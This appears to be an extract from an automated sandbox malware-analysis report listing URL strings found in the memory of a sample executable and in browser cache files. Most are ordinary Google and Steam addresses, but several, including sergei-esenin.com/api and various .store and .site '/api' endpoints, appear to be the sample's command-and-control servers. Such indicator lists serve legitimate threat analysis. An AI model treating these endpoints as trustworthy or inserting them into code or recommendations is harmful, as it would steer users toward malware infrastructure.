                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/apif
                                Source: chromecache_161.19.drString found in binary or memory: https://families.google.com/intl/
                                Source: chromecache_167.19.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/drive_2020q4/v10/192px.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/gmail_2020q4/v10/web-48dp/logo_gmail_2020q4_color_2x_web_
                                Source: chromecache_167.19.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/maps/v7/192px.svg
                                Source: chromecache_161.19.drString found in binary or memory: https://g.co/recover
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowere#
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobbipenju.store:443/apibcryptPrimitives.dllJ
                                Source: chromecache_161.19.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                                Source: chromecache_161.19.drString found in binary or memory: https://play.google.com/work/enroll?identifier=
                                Source: chromecache_161.19.drString found in binary or memory: https://play.google/intl/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/privacy
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/privacy/additional
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/privacy/google-partners
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/technologies/cookies
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/technologies/location-data
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/terms
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/terms/location
                                Source: chromecache_161.19.drString found in binary or memory: https://policies.google.com/terms/service-specific
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiO8
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spirittunek.store:443/apiG
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-email-pin.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-password.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-or-voice-pin.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-pin.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-stop-go-landing-page_1x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/animation/
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_device.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_pin.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_1x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_2x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_darkmode_1x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/continue_on_your_phone.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_phone_number_verification.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_silent_tap_yes_darkmode.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_tap_yes.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_tap_yes_darkmode.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kid_success.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kid_success_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_dark_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_updated.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_updated_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_v2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_not_ready.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_stick_around_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_stick_around_dark_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_account_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_account_darkmode_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_privacy_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_child_privacy_darkmode_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_created.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_double_device.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_double_device_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_full_house.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_link_accounts_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_link_accounts_darkmode_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_app_decision.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_app_decision_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_supervision_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_parent_supervision_darkmode_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_respect_others_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_respect_others_darkmode_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_single_device.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_single_device_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignup_stop.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/personalization_reminders.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/phone_number_sign_in_2x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/return_to_desktop.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/return_to_desktop_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_ios_center.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_laptop.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_nfc_discovered.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_nfc_discovered_darkmode.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/security_key_phone.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_googleapp_ios.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_googleapp_pulldown.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/signin_tapyes.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/smart_lock_2x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/usb_key.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/web_and_app_activity.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/who_will_be_using_this_device.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/embedded/you_tube_history.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/feature_not_available.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/feature_not_available_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/gmail_ios_authzen.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/paaskey.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_challenge.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_challenge_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_cross_device.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_cross_device_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_error.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_error_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_reauth.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_enrollment_reauth_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_success.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkey_success_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkeyerror.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/passkeyerror_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/red_globe_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/red_globe_light.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/screenlock.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_ipad.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone_nfc.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_iphone_usb.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_key_phone.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/security_keys.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/success_checkmark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/marc/success_checkmark_2_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/ui/loading_spinner_gm.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/ui/progress_spinner_color_20dp_4x.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/accounts/ui/success-gm-default_2x.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/apps/signup/resources/custom-email-address.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/images/hpp/shield_security_checkup_green_2x_web_96dp.png
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/account_setup_chapter_dark_1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/account_setup_chapter_v1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/device_setup_chapter_dark_v1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/device_setup_chapter_v1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/parental_control_chapter_dark_v1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/chaptering/parental_control_chapter_v1.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_accountslinked.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_accountslinked_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_childneedshelp.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_childneedshelp_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_nextstepsforparents.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/conversion/conversion_nextstepsforparents_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_allset.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_allset_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_apps_devices.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_apps_devices_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_areyousurekid.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_areyousurekid_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_birthdayemail.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_birthdayemail_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_choose_apps.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_choose_apps_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_confirmation.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_exploremore.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_exploremore_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_intro.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_intro_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_privacy_terms_a18.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_privacy_terms_a18_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_privacyterms.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_privacyterms_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_review_settings.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_review_settings_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_safe_search.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_safe_search_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_success_unchanged_a18.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_success_unchanged_a18_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_success_update_a18.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_success_update_a18_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervision_choice.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervision_choice_a18.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervision_choice_a18_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervision_choice_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervisiongrad.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/graduation/graduation_supervisiongrad_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/guardianlinking/linking_complete_0.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/guardianlinking/linking_complete_dark_0.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/ads_personalization.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/ads_personalization_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/confirmation.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/confirmation_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/eligibility_error.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/eligibility_error_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/fork.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/fork_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/intro.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/intro_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/personal_results.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/personal_results_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/safe_search.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/minormodeexit/safe_search_darkmode.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/check_notifications.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/check_notifications_dark.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_installing_family_link_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_installing_family_link_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_location_sharing_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_location_sharing_dark_2.svg
                                Source: chromecache_167.19.drString found in binary or memory: https://ssl.gstatic.com/kids/images/onboarding/kid_watch_set_up_parental_controls_2.svg
